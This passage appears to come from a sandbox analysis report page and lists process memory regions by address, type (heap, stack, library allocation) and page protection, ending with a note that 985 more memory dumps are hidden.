|
trusted library allocation
|
page read and write
|
||
2284EF65000
|
heap
|
page read and write
|
||
1B9566D6000
|
heap
|
page read and write
|
||
5B243FF000
|
stack
|
page read and write
|
||
7FFAAC776000
|
trusted library allocation
|
page execute and read and write
|
||
1B956712000
|
heap
|
page read and write
|
||
207AD69D000
|
trusted library allocation
|
page read and write
|
||
2284EC22000
|
heap
|
page read and write
|
||
1FB69682000
|
heap
|
page read and write
|
||
77E2B4E000
|
stack
|
page read and write
|
||
7FFAAC7B0000
|
trusted library allocation
|
page execute and read and write
|
||
1FACEBD0000
|
heap
|
page read and write
|
||
1E4E6D70000
|
heap
|
page read and write
|
||
1F1B2298000
|
heap
|
page read and write
|
||
178C122E000
|
heap
|
page read and write
|
||
1E4DEAD7000
|
trusted library allocation
|
page read and write
|
||
7FFB22782000
|
unkown
|
page readonly
|
||
1F1B22B1000
|
heap
|
page read and write
|
||
1F89123B000
|
heap
|
page read and write
|
||
1B956722000
|
heap
|
page read and write
|
||
7FFAAC980000
|
trusted library allocation
|
page read and write
|
||
3CA567F000
|
stack
|
page read and write
|
||
4E3DDFF000
|
stack
|
page read and write
|
||
207AD678000
|
trusted library allocation
|
page read and write
|
||
178C2CA0000
|
heap
|
page read and write
|
||
7FFAAC990000
|
trusted library allocation
|
page read and write
|
||
1B9566EF000
|
heap
|
page read and write
|
||
3FFF5FE000
|
stack
|
page read and write
|
||
7FFAAC9B0000
|
trusted library allocation
|
page read and write
|
||
46EED4C000
|
stack
|
page read and write
|
||
1B9566FB000
|
heap
|
page read and write
|
||
D1F23FD000
|
stack
|
page read and write
|
||
D1F26BE000
|
stack
|
page read and write
|
||
7FFB23A6D000
|
unkown
|
page readonly
|
There are 985 hidden memdumps, click here to show them.